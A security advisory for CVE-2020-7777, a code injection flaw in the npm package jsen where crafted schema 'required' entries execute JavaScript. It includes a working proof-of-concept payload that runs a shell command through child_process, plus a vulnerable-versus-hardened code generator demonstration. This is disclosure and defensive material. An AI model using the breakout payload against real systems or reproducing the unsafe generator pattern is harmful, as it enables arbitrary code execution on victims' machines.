GHSA-vm64-cfqx-3698

Source
https://github.com/advisories/GHSA-vm64-cfqx-3698
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-vm64-cfqx-3698/GHSA-vm64-cfqx-3698.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-vm64-cfqx-3698
Aliases
  • CVE-2020-7777
Published
2022-02-10T20:18:37Z
Modified
2023-11-08T04:04:09.974138Z
Severity
  • 7.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Code Injection in jsen
Details

This affects all versions of package jsen. If an attacker can control the schema file, they can run arbitrary JavaScript code on the victim machine. Neither the module description nor the README mentions any risk in using untrusted schema files, so the issue is assumed to be applicable. In particular, entries of the schema's required field are not properly sanitized: the validator source string that is built from the schema definition is passed to Function.apply(), so a crafted entry closes the string literal the key is embedded in and the remainder is compiled as code, leading to Arbitrary Code Execution.

PoC

const jsen = require('jsen');

// The schema is attacker-controlled. The single "required" entry closes the
// double-quoted string literal that jsen generates around the key and appends
// a call that runs `touch malicious` via child_process.
let schema = JSON.parse('{ "type": "object", "properties": { "username": { "type": "string" } }, "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""] }');

// Compiling the schema builds the validator source and hands it to Function;
// the injected call executes when the validator runs.
const validate = jsen(schema);
validate({});
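The breakout the PoC relies on, reproduced with a self-contained code-generating validator so it can be run without the vulnerable package. This is an added example, not jsen's own code: the toy compiler, the names naiveSource, safeSource, compileNaive, compileSafe, runNaive and runSafe, and the globalThis marker used in place of child_process are assumptions made for the demonstration. The vulnerable variant pastes each required key into JavaScript source; the hardened variant embeds the key with JSON.stringify and rejects non-string entries.

```javascript
// Added example (not jsen's code): the CWE-94 pattern from the advisory,
// beside a hardened variant. Constructed schema, hypothetical names.

// Vulnerable code generation: each entry of schema.required is spliced into
// the generated source as-is. A key containing a double quote terminates the
// string literal and everything after it is compiled as code.
function naiveSource(schema) {
  let src = '';
  for (const key of (schema.required || [])) {
    src += 'if (data["' + key + '"] === undefined) return false;\n';
  }
  return src + 'return true;';
}

function compileNaive(schema) {
  return new Function('data', naiveSource(schema));
}

// Hardened code generation: JSON.stringify yields a JavaScript string
// literal with quotes and backslashes escaped, so the key cannot escape the
// literal. Non-string entries are rejected instead of being coerced.
function safeSource(schema) {
  let src = '';
  for (const key of (schema.required || [])) {
    if (typeof key !== 'string') {
      throw new TypeError('schema.required entries must be strings');
    }
    src += 'if (data[' + JSON.stringify(key) + '] === undefined) return false;\n';
  }
  return src + 'return true;';
}

function compileSafe(schema) {
  return new Function('data', safeSource(schema));
}

// Constructed malicious schema. Same breakout shape as the advisory PoC
// ("\"+...+\""), but the payload sets a marker on globalThis instead of
// spawning a process, so the example is safe to run.
const marker = '__jsen_example_injected';
const payloadKey = '"+(globalThis.' + marker + '=true)+"';
const maliciousSchema = {
  type: 'object',
  properties: { username: { type: 'string' } },
  required: [payloadKey],
};

// Compile the malicious schema with the vulnerable generator and report
// whether the injected expression executed.
function runNaive() {
  delete globalThis[marker];
  const validate = compileNaive(maliciousSchema);
  const result = validate({});
  return { result, injected: globalThis[marker] === true };
}

// Same schema through the hardened generator: the key is only ever looked
// up as a property name, nothing is executed.
function runSafe() {
  delete globalThis[marker];
  const validate = compileSafe(maliciousSchema);
  const result = validate({});
  return { result, injected: globalThis[marker] === true };
}

console.log('vulnerable generator:', runNaive());
console.log('hardened generator:  ', runSafe());
console.log('generated (vulnerable):', naiveSource(maliciousSchema));
console.log('generated (hardened):  ', safeSource(maliciousSchema));
```

Run with node. Printing the two generated sources side by side is the most useful part: in the vulnerable output the payload sits outside any string literal, in the hardened output it is an escaped string. Because the advisory lists no fixed version of jsen (last affected 0.6.6, no fix event), the practical defence for users of the package is to treat schemas as trusted code and never compile a schema supplied by an untrusted party.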
Database specific
{
    "github_reviewed_at": "2021-04-14T19:49:04Z",
    "github_reviewed": true,
    "severity": "HIGH",
    "nvd_published_at": "2020-11-23T16:15:00Z",
    "cwe_ids": [
        "CWE-94"
    ]
}
References

Affected packages

npm / jsen

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Last affected
0.6.6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-vm64-cfqx-3698/GHSA-vm64-cfqx-3698.json"